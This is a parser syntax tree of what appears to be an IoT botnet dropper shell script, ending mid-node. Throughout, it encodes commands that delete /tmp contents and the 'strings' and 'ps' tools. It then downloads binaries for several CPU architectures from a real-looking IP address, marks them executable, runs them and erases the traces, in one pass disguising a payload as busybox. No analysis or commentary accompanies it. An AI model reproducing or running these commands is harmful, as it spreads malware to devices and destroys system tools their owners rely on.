CommandNode(lineno=2, pos=(13, 35), parts=[
  WordNode(lineno=2, pos=(13, 20), word='busybox'),
  WordNode(lineno=2, pos=(21, 23), word='rm'),
  WordNode(lineno=2, pos=(24, 27), word='-rf'),
  WordNode(lineno=2, pos=(28, 35), word='/tmp/*\r'),
])
CommandNode(lineno=3, pos=(36, 68), parts=[
  WordNode(lineno=3, pos=(36, 43), word='busybox'),
  WordNode(lineno=3, pos=(44, 46), word='rm'),
  WordNode(lineno=3, pos=(47, 50), word='-rf'),
  WordNode(lineno=3, pos=(51, 68), word='/usr/bin/strings\r'),
])
CommandNode(lineno=4, pos=(69, 96), parts=[
  WordNode(lineno=4, pos=(69, 76), word='busybox'),
  WordNode(lineno=4, pos=(77, 79), word='rm'),
  WordNode(lineno=4, pos=(80, 83), word='-rf'),
  WordNode(lineno=4, pos=(84, 96), word='/usr/bin/ps\r'),
])
ListNode(lineno=5, pos=(97, 183), parts=[
  CommandNode(lineno=5, pos=(97, 133), parts=[
    WordNode(lineno=5, pos=(97, 104), word='busybox'),
    WordNode(lineno=5, pos=(105, 109), word='wget'),
    WordNode(lineno=5, pos=(110, 133), word='http://80.82.64.190/arm'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(133, 134)),
  CommandNode(lineno=5, pos=(135, 155), parts=[
    WordNode(lineno=5, pos=(135, 142), word='busybox'),
    WordNode(lineno=5, pos=(143, 148), word='chmod'),
    WordNode(lineno=5, pos=(149, 151), word='+x'),
    WordNode(lineno=5, pos=(152, 155), word='arm'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(155, 156)),
  CommandNode(lineno=5, pos=(157, 162), parts=[
    WordNode(lineno=5, pos=(157, 162), word='./arm'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(162, 163)),
  CommandNode(lineno=5, pos=(164, 183), parts=[
    WordNode(lineno=5, pos=(164, 171), word='busybox'),
    WordNode(lineno=5, pos=(172, 174), word='rm'),
    WordNode(lineno=5, pos=(175, 177), word='-f'),
    WordNode(lineno=5, pos=(178, 183), word='arm*\r'),
  ]),
])
CommandNode(lineno=6, pos=(184, 192), parts=[
  WordNode(lineno=6, pos=(184, 186), word='rm'),
  WordNode(lineno=6, pos=(187, 189), word='-f'),
  WordNode(lineno=6, pos=(190, 192), word='*\r'),
])
ListNode(lineno=7, pos=(193, 292), parts=[
  CommandNode(lineno=7, pos=(193, 236), parts=[
    WordNode(lineno=7, pos=(193, 200), word='busybox'),
    WordNode(lineno=7, pos=(201, 205), word='wget'),
    WordNode(lineno=7, pos=(206, 210), word='wget'),
    WordNode(lineno=7, pos=(211, 236), word='http://80.82.64.190/sparc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(236, 237)),
  CommandNode(lineno=7, pos=(238, 260), parts=[
    WordNode(lineno=7, pos=(238, 245), word='busybox'),
    WordNode(lineno=7, pos=(246, 251), word='chmod'),
    WordNode(lineno=7, pos=(252, 254), word='+x'),
    WordNode(lineno=7, pos=(255, 260), word='sparc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(260, 261)),
  CommandNode(lineno=7, pos=(262, 269), parts=[
    WordNode(lineno=7, pos=(262, 269), word='./sparc'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(269, 270)),
  CommandNode(lineno=7, pos=(271, 292), parts=[
    WordNode(lineno=7, pos=(271, 278), word='busybox'),
    WordNode(lineno=7, pos=(279, 281), word='rm'),
    WordNode(lineno=7, pos=(282, 284), word='-f'),
    WordNode(lineno=7, pos=(285, 292), word='sparc*\r'),
  ]),
])
CommandNode(lineno=8, pos=(293, 301), parts=[
  WordNode(lineno=8, pos=(293, 295), word='rm'),
  WordNode(lineno=8, pos=(296, 298), word='-f'),
  WordNode(lineno=8, pos=(299, 301), word='*\r'),
])
ListNode(lineno=9, pos=(302, 388), parts=[
  CommandNode(lineno=9, pos=(302, 338), parts=[
    WordNode(lineno=9, pos=(302, 309), word='busybox'),
    WordNode(lineno=9, pos=(310, 314), word='wget'),
    WordNode(lineno=9, pos=(315, 338), word='http://80.82.64.190/sh4'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(338, 339)),
  CommandNode(lineno=9, pos=(340, 360), parts=[
    WordNode(lineno=9, pos=(340, 347), word='busybox'),
    WordNode(lineno=9, pos=(348, 353), word='chmod'),
    WordNode(lineno=9, pos=(354, 356), word='+x'),
    WordNode(lineno=9, pos=(357, 360), word='sh4'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(360, 361)),
  CommandNode(lineno=9, pos=(362, 367), parts=[
    WordNode(lineno=9, pos=(362, 367), word='./sh4'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(367, 368)),
  CommandNode(lineno=9, pos=(369, 388), parts=[
    WordNode(lineno=9, pos=(369, 376), word='busybox'),
    WordNode(lineno=9, pos=(377, 379), word='rm'),
    WordNode(lineno=9, pos=(380, 382), word='-f'),
    WordNode(lineno=9, pos=(383, 388), word='sh4*\r'),
  ]),
])
CommandNode(lineno=10, pos=(389, 397), parts=[
  WordNode(lineno=10, pos=(389, 391), word='rm'),
  WordNode(lineno=10, pos=(392, 394), word='-f'),
  WordNode(lineno=10, pos=(395, 397), word='*\r'),
])
ListNode(lineno=11, pos=(398, 512), parts=[
  CommandNode(lineno=11, pos=(398, 441), parts=[
    WordNode(lineno=11, pos=(398, 405), word='busybox'),
    WordNode(lineno=11, pos=(406, 410), word='wget'),
    WordNode(lineno=11, pos=(411, 441), word='http://80.82.64.190/powerpc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(441, 442)),
  CommandNode(lineno=11, pos=(443, 470), parts=[
    WordNode(lineno=11, pos=(443, 450), word='busybox'),
    WordNode(lineno=11, pos=(451, 456), word='chmod'),
    WordNode(lineno=11, pos=(457, 459), word='+x'),
    WordNode(lineno=11, pos=(460, 470), word='powerpc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(470, 471)),
  CommandNode(lineno=11, pos=(472, 484), parts=[
    WordNode(lineno=11, pos=(472, 484), word='./powerpc440'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(484, 485)),
  CommandNode(lineno=11, pos=(486, 512), parts=[
    WordNode(lineno=11, pos=(486, 493), word='busybox'),
    WordNode(lineno=11, pos=(494, 496), word='rm'),
    WordNode(lineno=11, pos=(497, 499), word='-f'),
    WordNode(lineno=11, pos=(500, 512), word='powerpc440*\r'),
  ]),
])
CommandNode(lineno=12, pos=(513, 521), parts=[
  WordNode(lineno=12, pos=(513, 515), word='rm'),
  WordNode(lineno=12, pos=(516, 518), word='-f'),
  WordNode(lineno=12, pos=(519, 521), word='*\r'),
])
ListNode(lineno=13, pos=(522, 624), parts=[
  CommandNode(lineno=13, pos=(522, 562), parts=[
    WordNode(lineno=13, pos=(522, 529), word='busybox'),
    WordNode(lineno=13, pos=(530, 534), word='wget'),
    WordNode(lineno=13, pos=(535, 562), word='http://80.82.64.190/powerpc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(562, 563)),
  CommandNode(lineno=13, pos=(564, 588), parts=[
    WordNode(lineno=13, pos=(564, 571), word='busybox'),
    WordNode(lineno=13, pos=(572, 577), word='chmod'),
    WordNode(lineno=13, pos=(578, 580), word='+x'),
    WordNode(lineno=13, pos=(581, 588), word='powerpc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(588, 589)),
  CommandNode(lineno=13, pos=(590, 599), parts=[
    WordNode(lineno=13, pos=(590, 599), word='./powerpc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(599, 600)),
  CommandNode(lineno=13, pos=(601, 624), parts=[
    WordNode(lineno=13, pos=(601, 608), word='busybox'),
    WordNode(lineno=13, pos=(609, 611), word='rm'),
    WordNode(lineno=13, pos=(612, 614), word='-f'),
    WordNode(lineno=13, pos=(615, 624), word='powerpc*\r'),
  ]),
])
CommandNode(lineno=14, pos=(625, 633), parts=[
  WordNode(lineno=14, pos=(625, 627), word='rm'),
  WordNode(lineno=14, pos=(628, 630), word='-f'),
  WordNode(lineno=14, pos=(631, 633), word='*\r'),
])
ListNode(lineno=15, pos=(634, 732), parts=[
  CommandNode(lineno=15, pos=(634, 673), parts=[
    WordNode(lineno=15, pos=(634, 641), word='busybox'),
    WordNode(lineno=15, pos=(642, 646), word='wget'),
    WordNode(lineno=15, pos=(647, 673), word='http://80.82.64.190/mipsel'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(673, 674)),
  CommandNode(lineno=15, pos=(675, 698), parts=[
    WordNode(lineno=15, pos=(675, 682), word='busybox'),
    WordNode(lineno=15, pos=(683, 688), word='chmod'),
    WordNode(lineno=15, pos=(689, 691), word='+x'),
    WordNode(lineno=15, pos=(692, 698), word='mipsel'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(698, 699)),
  CommandNode(lineno=15, pos=(700, 708), parts=[
    WordNode(lineno=15, pos=(700, 708), word='./mipsel'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(708, 709)),
  CommandNode(lineno=15, pos=(710, 732), parts=[
    WordNode(lineno=15, pos=(710, 717), word='busybox'),
    WordNode(lineno=15, pos=(718, 720), word='rm'),
    WordNode(lineno=15, pos=(721, 723), word='-f'),
    WordNode(lineno=15, pos=(724, 732), word='mipsel*\r'),
  ]),
])
CommandNode(lineno=16, pos=(733, 741), parts=[
  WordNode(lineno=16, pos=(733, 735), word='rm'),
  WordNode(lineno=16, pos=(736, 738), word='-f'),
  WordNode(lineno=16, pos=(739, 741), word='*\r'),
])
ListNode(lineno=17, pos=(742, 832), parts=[
  CommandNode(lineno=17, pos=(742, 779), parts=[
    WordNode(lineno=17, pos=(742, 749), word='busybox'),
    WordNode(lineno=17, pos=(750, 754), word='wget'),
    WordNode(lineno=17, pos=(755, 779), word='http://80.82.64.190/mips'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(779, 780)),
  CommandNode(lineno=17, pos=(781, 802), parts=[
    WordNode(lineno=17, pos=(781, 788), word='busybox'),
    WordNode(lineno=17, pos=(789, 794), word='chmod'),
    WordNode(lineno=17, pos=(795, 797), word='+x'),
    WordNode(lineno=17, pos=(798, 802), word='mips'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(802, 803)),
  CommandNode(lineno=17, pos=(804, 810), parts=[
    WordNode(lineno=17, pos=(804, 810), word='./mips'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(810, 811)),
  CommandNode(lineno=17, pos=(812, 832), parts=[
    WordNode(lineno=17, pos=(812, 819), word='busybox'),
    WordNode(lineno=17, pos=(820, 822), word='rm'),
    WordNode(lineno=17, pos=(823, 825), word='-f'),
    WordNode(lineno=17, pos=(826, 832), word='mips*\r'),
  ]),
])
CommandNode(lineno=18, pos=(833, 841), parts=[
  WordNode(lineno=18, pos=(833, 835), word='rm'),
  WordNode(lineno=18, pos=(836, 838), word='-f'),
  WordNode(lineno=18, pos=(839, 841), word='*\r'),
])
CommandNode(lineno=19, pos=(842, 843), parts=[
  WordNode(lineno=19, pos=(842, 843), word='\r'),
])
ListNode(lineno=20, pos=(844, 1029), parts=[
  CommandNode(lineno=20, pos=(844, 880), parts=[
    WordNode(lineno=20, pos=(844, 851), word='busybox'),
    WordNode(lineno=20, pos=(852, 856), word='wget'),
    WordNode(lineno=20, pos=(857, 880), word='http://80.82.64.190/arm'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(880, 881)),
  CommandNode(lineno=20, pos=(882, 908), parts=[
    WordNode(lineno=20, pos=(882, 889), word='busybox'),
    WordNode(lineno=20, pos=(890, 892), word='cp'),
    WordNode(lineno=20, pos=(893, 905), word='/bin/busybox'),
    WordNode(lineno=20, pos=(906, 908), word='./'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(908, 909)),
  CommandNode(lineno=20, pos=(910, 935), parts=[
    WordNode(lineno=20, pos=(910, 917), word='busybox'),
    WordNode(lineno=20, pos=(918, 921), word='cat'),
    WordNode(lineno=20, pos=(922, 925), word='arm'),
    RedirectNode(lineno=20, output=
      WordNode(lineno=20, pos=(928, 935), word='busybox'), pos=(926, 935), type='>'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(935, 936)),
  CommandNode(lineno=20, pos=(937, 954), parts=[
    WordNode(lineno=20, pos=(937, 944), word='busybox'),
    WordNode(lineno=20, pos=(945, 947), word='rm'),
    WordNode(lineno=20, pos=(948, 950), word='-f'),
    WordNode(lineno=20, pos=(951, 954), word='arm'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(954, 955)),
  CommandNode(lineno=20, pos=(956, 978), parts=[
    WordNode(lineno=20, pos=(956, 963), word='busybox'),
    WordNode(lineno=20, pos=(964, 966), word='cp'),
    WordNode(lineno=20, pos=(967, 974), word='busybox'),
    WordNode(lineno=20, pos=(975, 978), word='arm'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(978, 979)),
  CommandNode(lineno=20, pos=(980, 1001), parts=[
    WordNode(lineno=20, pos=(980, 987), word='busybox'),
    WordNode(lineno=20, pos=(988, 990), word='rm'),
    WordNode(lineno=20, pos=(991, 993), word='-f'),
    WordNode(lineno=20, pos=(994, 1001), word='busybox'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1001, 1002)),
  CommandNode(lineno=20, pos=(1003, 1008), parts=[
    WordNode(lineno=20, pos=(1003, 1008), word='./arm'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(1008, 1009)),
  CommandNode(lineno=20, pos=(1010, 1029), parts=[
    WordNode(lineno=20, pos=(1010, 1017), word='busybox'),
    WordNode(lineno=20, pos=(1018, 1020), word='rm'),
    WordNode(lineno=20, pos=(1021, 1023), word='-f'),
    WordNode(lineno=20, pos=(1024, 1029), word='arm*\r'),
  ]),
])
CommandNode(lineno=21, pos=(1030, 1038), parts=[
  WordNode(lineno=21, pos=(1030, 1032), word='rm'),
  WordNode(lineno=21, pos=(1033, 1035), word='-f'),
  WordNode(lineno=21, pos=(1036, 1038), word='*\r'),
])
ListNode(lineno=22, pos=(1039, 1236), parts=[
  CommandNode(lineno=22, pos=(1039, 1077), parts=[
    WordNode(lineno=22, pos=(1039, 1046), word='busybox'),
    WordNode(lineno=22, pos=(1047, 1051), word='wget'),
    WordNode(lineno=22, pos=(1052, 1077), word='http://80.82.64.190/sparc'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1077, 1078)),
  CommandNode(lineno=22, pos=(1079, 1105), parts=[
    WordNode(lineno=22, pos=(1079, 1086), word='busybox'),
    WordNode(lineno=22, pos=(1087, 1089), word='cp'),
    WordNode(lineno=22, pos=(1090, 1102), word='/bin/busybox'),
    WordNode(lineno=22, pos=(1103, 1105), word='./'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1105, 1106)),
  CommandNode(lineno=22, pos=(1107, 1134), parts=[
    WordNode(lineno=22, pos=(1107, 1114), word='busybox'),
    WordNode(lineno=22, pos=(1115, 1118), word='cat'),
    WordNode(lineno=22, pos=(1119, 1124), word='sparc'),
    RedirectNode(lineno=22, output=
      WordNode(lineno=22, pos=(1127, 1134), word='busybox'), pos=(1125, 1134), type='>'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1134, 1135)),
  CommandNode(lineno=22, pos=(1136, 1155), parts=[
    WordNode(lineno=22, pos=(1136, 1143), word='busybox'),
    WordNode(lineno=22, pos=(1144, 1146), word='rm'),
    WordNode(lineno=22, pos=(1147, 1149), word='-f'),
    WordNode(lineno=22, pos=(1150, 1155), word='sparc'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1155, 1156)),
  CommandNode(lineno=22, pos=(1157, 1181), parts=[
    WordNode(lineno=22, pos=(1157, 1164), word='busybox'),
    WordNode(lineno=22, pos=(1165, 1167), word='cp'),
    WordNode(lineno=22, pos=(1168, 1175), word='busybox'),
    WordNode(lineno=22, pos=(1176, 1181), word='sparc'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1181, 1182)),
  CommandNode(lineno=22, pos=(1183, 1204), parts=[
    WordNode(lineno=22, pos=(1183, 1190), word='busybox'),
    WordNode(lineno=22, pos=(1191, 1193), word='rm'),
    WordNode(lineno=22, pos=(1194, 1196), word='-f'),
    WordNode(lineno=22, pos=(1197, 1204), word='busybox'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1204, 1205)),
  CommandNode(lineno=22, pos=(1206, 1213), parts=[
    WordNode(lineno=22, pos=(1206, 1213), word='./sparc'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(1213, 1214)),
  CommandNode(lineno=22, pos=(1215, 1236), parts=[
    WordNode(lineno=22, pos=(1215, 1222), word='busybox'),
    WordNode(lineno=22, pos=(1223, 1225), word='rm'),
    WordNode(lineno=22, pos=(1226, 1228), word='-f'),
    WordNode(lineno=22, pos=(1229, 1236), word='sparc*\r'),
  ]),
])
CommandNode(lineno=23, pos=(1237, 1245), parts=[
  WordNode(lineno=23, pos=(1237, 1239), word='rm'),
  WordNode(lineno=23, pos=(1240, 1242), word='-f'),
  WordNode(lineno=23, pos=(1243, 1245), word='*\r'),
])
ListNode(lineno=24, pos=(1246, 1431), parts=[
  CommandNode(lineno=24, pos=(1246, 1282), parts=[
    WordNode(lineno=24, pos=(1246, 1253), word='busybox'),
    WordNode(lineno=24, pos=(1254, 1258), word='wget'),
    WordNode(lineno=24, pos=(1259, 1282), word='http://80.82.64.190/sh4'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1282, 1283)),
  CommandNode(lineno=24, pos=(1284, 1310), parts=[
    WordNode(lineno=24, pos=(1284, 1291), word='busybox'),
    WordNode(lineno=24, pos=(1292, 1294), word='cp'),
    WordNode(lineno=24, pos=(1295, 1307), word='/bin/busybox'),
    WordNode(lineno=24, pos=(1308, 1310), word='./'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1310, 1311)),
  CommandNode(lineno=24, pos=(1312, 1337), parts=[
    WordNode(lineno=24, pos=(1312, 1319), word='busybox'),
    WordNode(lineno=24, pos=(1320, 1323), word='cat'),
    WordNode(lineno=24, pos=(1324, 1327), word='sh4'),
    RedirectNode(lineno=24, output=
      WordNode(lineno=24, pos=(1330, 1337), word='busybox'), pos=(1328, 1337), type='>'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1337, 1338)),
  CommandNode(lineno=24, pos=(1339, 1356), parts=[
    WordNode(lineno=24, pos=(1339, 1346), word='busybox'),
    WordNode(lineno=24, pos=(1347, 1349), word='rm'),
    WordNode(lineno=24, pos=(1350, 1352), word='-f'),
    WordNode(lineno=24, pos=(1353, 1356), word='sh4'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1356, 1357)),
  CommandNode(lineno=24, pos=(1358, 1380), parts=[
    WordNode(lineno=24, pos=(1358, 1365), word='busybox'),
    WordNode(lineno=24, pos=(1366, 1368), word='cp'),
    WordNode(lineno=24, pos=(1369, 1376), word='busybox'),
    WordNode(lineno=24, pos=(1377, 1380), word='sh4'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1380, 1381)),
  CommandNode(lineno=24, pos=(1382, 1403), parts=[
    WordNode(lineno=24, pos=(1382, 1389), word='busybox'),
    WordNode(lineno=24, pos=(1390, 1392), word='rm'),
    WordNode(lineno=24, pos=(1393, 1395), word='-f'),
    WordNode(lineno=24, pos=(1396, 1403), word='busybox'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1403, 1404)),
  CommandNode(lineno=24, pos=(1405, 1410), parts=[
    WordNode(lineno=24, pos=(1405, 1410), word='./sh4'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(1410, 1411)),
  CommandNode(lineno=24, pos=(1412, 1431), parts=[
    WordNode(lineno=24, pos=(1412, 1419), word='busybox'),
    WordNode(lineno=24, pos=(1420, 1422), word='rm'),
    WordNode(lineno=24, pos=(1423, 1425), word='-f'),
    WordNode(lineno=24, pos=(1426, 1431), word='sh4*\r'),
  ]),
])
CommandNode(lineno=25, pos=(1432, 1440), parts=[
  WordNode(lineno=25, pos=(1432, 1434), word='rm'),
  WordNode(lineno=25, pos=(1435, 1437), word='-f'),
  WordNode(lineno=25, pos=(1438, 1440), word='*\r'),
])
ListNode(lineno=26, pos=(1441, 1668), parts=[
  CommandNode(lineno=26, pos=(1441, 1484), parts=[
    WordNode(lineno=26, pos=(1441, 1448), word='busybox'),
    WordNode(lineno=26, pos=(1449, 1453), word='wget'),
    WordNode(lineno=26, pos=(1454, 1484), word='http://80.82.64.190/powerpc440'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1484, 1485)),
  CommandNode(lineno=26, pos=(1486, 1512), parts=[
    WordNode(lineno=26, pos=(1486, 1493), word='busybox'),
    WordNode(lineno=26, pos=(1494, 1496), word='cp'),
    WordNode(lineno=26, pos=(1497, 1509), word='/bin/busybox'),
    WordNode(lineno=26, pos=(1510, 1512), word='./'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1512, 1513)),
  CommandNode(lineno=26, pos=(1514, 1546), parts=[
    WordNode(lineno=26, pos=(1514, 1521), word='busybox'),
    WordNode(lineno=26, pos=(1522, 1525), word='cat'),
    WordNode(lineno=26, pos=(1526, 1536), word='powerpc440'),
    RedirectNode(lineno=26, output=
      WordNode(lineno=26, pos=(1539, 1546), word='busybox'), pos=(1537, 1546), type='>'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1546, 1547)),
  CommandNode(lineno=26, pos=(1548, 1572), parts=[
    WordNode(lineno=26, pos=(1548, 1555), word='busybox'),
    WordNode(lineno=26, pos=(1556, 1558), word='rm'),
    WordNode(lineno=26, pos=(1559, 1561), word='-f'),
    WordNode(lineno=26, pos=(1562, 1572), word='powerpc440'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1572, 1573)),
  CommandNode(lineno=26, pos=(1574, 1603), parts=[
    WordNode(lineno=26, pos=(1574, 1581), word='busybox'),
    WordNode(lineno=26, pos=(1582, 1584), word='cp'),
    WordNode(lineno=26, pos=(1585, 1592), word='busybox'),
    WordNode(lineno=26, pos=(1593, 1603), word='powerpc440'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1603, 1604)),
  CommandNode(lineno=26, pos=(1605, 1626), parts=[
    WordNode(lineno=26, pos=(1605, 1612), word='busybox'),
    WordNode(lineno=26, pos=(1613, 1615), word='rm'),
    WordNode(lineno=26, pos=(1616, 1618), word='-f'),
    WordNode(lineno=26, pos=(1619, 1626), word='busybox'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1626, 1627)),
  CommandNode(lineno=26, pos=(1628, 1640), parts=[
    WordNode(lineno=26, pos=(1628, 1640), word='./powerpc440'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(1640, 1641)),
  CommandNode(lineno=26, pos=(1642, 1668), parts=[
    WordNode(lineno=26, pos=(1642, 1649), word='busybox'),
    WordNode(lineno=26, pos=(1650, 1652), word='rm'),
    WordNode(lineno=26, pos=(1653, 1655), word='-f'),
    WordNode(lineno=26, pos=(1656, 1668), word='powerpc440*\r'),
  ]),
])
CommandNode(lineno=27, pos=(1669, 1677), parts=[
  WordNode(lineno=27, pos=(1669, 1671), word='rm'),
  WordNode(lineno=27, pos=(1672, 1674), word='-f'),
  WordNode(lineno=27, pos=(1675, 1677), word='*\r'),
])
ListNode(lineno=28, pos=(1678, 1887), parts=[
  CommandNode(lineno=28, pos=(1678, 1718), parts=[
    WordNode(lineno=28, pos=(1678, 1685), word='busybox'),
    WordNode(lineno=28, pos=(1686, 1690), word='wget'),
    WordNode(lineno=28, pos=(1691, 1718), word='http://80.82.64.190/powerpc'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1718, 1719)),
  CommandNode(lineno=28, pos=(1720, 1746), parts=[
    WordNode(lineno=28, pos=(1720, 1727), word='busybox'),
    WordNode(lineno=28, pos=(1728, 1730), word='cp'),
    WordNode(lineno=28, pos=(1731, 1743), word='/bin/busybox'),
    WordNode(lineno=28, pos=(1744, 1746), word='./'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1746, 1747)),
  CommandNode(lineno=28, pos=(1748, 1777), parts=[
    WordNode(lineno=28, pos=(1748, 1755), word='busybox'),
    WordNode(lineno=28, pos=(1756, 1759), word='cat'),
    WordNode(lineno=28, pos=(1760, 1767), word='powerpc'),
    RedirectNode(lineno=28, output=
      WordNode(lineno=28, pos=(1770, 1777), word='busybox'), pos=(1768, 1777), type='>'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1777, 1778)),
  CommandNode(lineno=28, pos=(1779, 1800), parts=[
    WordNode(lineno=28, pos=(1779, 1786), word='busybox'),
    WordNode(lineno=28, pos=(1787, 1789), word='rm'),
    WordNode(lineno=28, pos=(1790, 1792), word='-f'),
    WordNode(lineno=28, pos=(1793, 1800), word='powerpc'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1800, 1801)),
  CommandNode(lineno=28, pos=(1802, 1828), parts=[
    WordNode(lineno=28, pos=(1802, 1809), word='busybox'),
    WordNode(lineno=28, pos=(1810, 1812), word='cp'),
    WordNode(lineno=28, pos=(1813, 1820), word='busybox'),
    WordNode(lineno=28, pos=(1821, 1828), word='powerpc'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1828, 1829)),
  CommandNode(lineno=28, pos=(1830, 1851), parts=[
    WordNode(lineno=28, pos=(1830, 1837), word='busybox'),
    WordNode(lineno=28, pos=(1838, 1840), word='rm'),
    WordNode(lineno=28, pos=(1841, 1843), word='-f'),
    WordNode(lineno=28, pos=(1844, 1851), word='busybox'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1851, 1852)),
  CommandNode(lineno=28, pos=(1853, 1862), parts=[
    WordNode(lineno=28, pos=(1853, 1862), word='./powerpc'),
  ]),
  OperatorNode(lineno=28, op=';', pos=(1862, 1863)),
  CommandNode(lineno=28, pos=(1864, 1887), parts=[
    WordNode(lineno=28, pos=(1864, 1871), word='busybox'),
    WordNode(lineno=28, pos=(1872, 1874), word='rm'),
    WordNode(lineno=28, pos=(1875, 1877), word='-f'),
    WordNode(lineno=28, pos=(1878, 1887), word='powerpc*\r'),
  ]),
])
CommandNode(lineno=29, pos=(1888, 1896), parts=[
  WordNode(lineno=29, pos=(1888, 1890), word='rm'),
  WordNode(lineno=29, pos=(1891, 1893), word='-f'),
  WordNode(lineno=29, pos=(1894, 1896), word='*\r'),
])
ListNode(lineno=30, pos=(1897, 2100), parts=[
  CommandNode(lineno=30, pos=(1897, 1936), parts=[
    WordNode(lineno=30, pos=(1897, 1904), word='busybox'),
    WordNode(lineno=30, pos=(1905, 1909), word='wget'),
    WordNode(lineno=30, pos=(1910, 1936), word='http://80.82.64.190/mipsel'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(1936, 1937)),
  CommandNode(lineno=30, pos=(1938, 1964), parts=[
    WordNode(lineno=30, pos=(1938, 1945), word='busybox'),
    WordNode(lineno=30, pos=(1946, 1948), word='cp'),
    WordNode(lineno=30, pos=(1949, 1961), word='/bin/busybox'),
    WordNode(lineno=30, pos=(1962, 1964), word='./'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(1964, 1965)),
  CommandNode(lineno=30, pos=(1966, 1994), parts=[
    WordNode(lineno=30, pos=(1966, 1973), word='busybox'),
    WordNode(lineno=30, pos=(1974, 1977), word='cat'),
    WordNode(lineno=30, pos=(1978, 1984), word='mipsel'),
    RedirectNode(lineno=30, output=
      WordNode(lineno=30, pos=(1987, 1994), word='busybox'), pos=(1985, 1994), type='>'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(1994, 1995)),
  CommandNode(lineno=30, pos=(1996, 2016), parts=[
    WordNode(lineno=30, pos=(1996, 2003), word='busybox'),
    WordNode(lineno=30, pos=(2004, 2006), word='rm'),
    WordNode(lineno=30, pos=(2007, 2009), word='-f'),
    WordNode(lineno=30, pos=(2010, 2016), word='mipsel'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(2016, 2017)),
  CommandNode(lineno=30, pos=(2018, 2043), parts=[
    WordNode(lineno=30, pos=(2018, 2025), word='busybox'),
    WordNode(lineno=30, pos=(2026, 2028), word='cp'),
    WordNode(lineno=30, pos=(2029, 2036), word='busybox'),
    WordNode(lineno=30, pos=(2037, 2043), word='mipsel'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(2043, 2044)),
  CommandNode(lineno=30, pos=(2045, 2066), parts=[
    WordNode(lineno=30, pos=(2045, 2052), word='busybox'),
    WordNode(lineno=30, pos=(2053, 2055), word='rm'),
    WordNode(lineno=30, pos=(2056, 2058), word='-f'),
    WordNode(lineno=30, pos=(2059, 2066), word='busybox'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(2066, 2067)),
  CommandNode(lineno=30, pos=(2068, 2076), parts=[
    WordNode(lineno=30, pos=(2068, 2076), word='./mipsel'),
  ]),
  OperatorNode(lineno=30, op=';', pos=(2076, 2077)),
  CommandNode(lineno=30, pos=(2078, 2100), parts=[
    WordNode(lineno=30, pos=(2078, 2085), word='busybox'),
    WordNode(lineno=30, pos=(2086, 2088), word='rm'),
    WordNode(lineno=30, pos=(2089, 2091), word='-f'),
    WordNode(lineno=30, pos=(2092, 2100), word='mipsel*\r'),
  ]),
])
CommandNode(lineno=31, pos=(2101, 2109), parts=[
  WordNode(lineno=31, pos=(2101, 2103), word='rm'),
  WordNode(lineno=31, pos=(2104, 2106), word='-f'),
  WordNode(lineno=31, pos=(2107, 2109), word='*\r'),
])
ListNode(lineno=32, pos=(2110, 2300), parts=[
  CommandNode(lineno=32, pos=(2110, 2174), parts=[
    WordNode(lineno=32, pos=(2110, 2117), word='busybox'),
    WordNode(lineno=32, pos=(2118, 2122), word='wget'),
    WordNode(lineno=32, pos=(2123, 2147), word='http://80.82.64.190/mips'),
    WordNode(lineno=32, pos=(2148, 2155), word='busybox'),
    WordNode(lineno=32, pos=(2156, 2158), word='cp'),
